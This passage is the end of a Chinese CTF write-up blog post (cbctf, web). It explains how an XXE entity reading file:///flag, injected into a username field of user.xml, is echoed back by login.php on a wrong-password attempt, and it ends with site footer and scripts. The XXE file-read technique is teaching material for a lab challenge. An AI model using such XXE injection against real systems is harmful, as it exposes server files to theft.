<li>其实如果不在这个目录下，可能就要按照默认目录的顺序挨个读取了，但是大部分题不会为难你的。因为ctf的目的还是为了模拟实战，而实战中<strong>目标信息在什么目录</strong>下并不是<strong>主要的危害之处</strong>，主要的危害之处应该是XXE这种<strong>攻击方法</strong>，有了这种方法就可以实施攻击，而信息隐藏在什么地方无非就是多花点时间找一找而已。</li>
</ul>
</li>
<li><p>为什么要在<username> 的标签中注入呢？</username></p>
<ul>
<li><p>我们按照顺序接着阅读源码，会发现在login.php中有一句代码是可以返回username参数的</p>
<figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">if</span>($user_record-&gt;</span><span class="hljs-function"><span class="hljs-title">user</span>-&gt;</span><span class="hljs-function"><span class="hljs-title">password</span> != $password) die(&quot;Password error <span class="hljs-keyword">for</span> User:&quot;.$user_record-&gt;</span><span class="hljs-function"><span class="hljs-title">user</span>-&gt;</span>username);<br></code></pre></td></tr></table></figure>

<p>所以在输入错误密码回显的时候，就可以将user.xml里的<username>标签里执行的&amp;xxe-&gt;file:&#x2F;&#x2F;&#x2F;flag给回显出来，就可以拿到flag</username></p>
</li>
</ul>
</li>
</ul>
<p>我们之前已经注入完毕，接下来只需要回到&#x2F;login.php然后传入错误的password就可以拿到flag</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">/<span class="hljs-keyword">login</span>.php?username=<span class="hljs-keyword">admin</span>&amp;<span class="hljs-keyword">password</span>=wrong_password<br></code></pre></td></tr></table></figure>






                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/ctf/" class="category-chain-item">ctf</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/ctf-web/" class="print-no-link">#ctf-web</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>cbctf</div>
      <div>https://elvpatic.github.io/2025/09/26/cbctf/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>e1vp4tic</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年9月26日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/09/11/Litctf/" title="Litctf">
                        <span class="hidden-mobile">Litctf</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"Ir7RKiGS9zwhgtD416XsiDP6-gzGzoHsz","appKey":"1SAbfug15rHHsZTk8W9CUHLs","path":"window.location.pathname","placeholder":null,"avatar":"monsterid","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  <span id="timeDate">正在载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("11/3/2024 00:00:00");
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "世间从不缺令人心动的新鲜感，难得的是长久的陪伴，这篇blog已经陪了你&nbsp"+dnum+"&nbsp天";  
      document.getElementById("times").innerHTML = hnum + "&nbsp时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
  }
  setInterval("createtime()",250);
  </script>
</div>
  
    <div class="footer-content">
       <div style="text-align:center"> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> </div> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        <div style="text-align:center">总访问 
        <span id="leancloud-site-pv"></span>
         次</div>
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        <div style="text-align:center">总访客 
        <span id="leancloud-site-uv"></span>
         人</div>
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
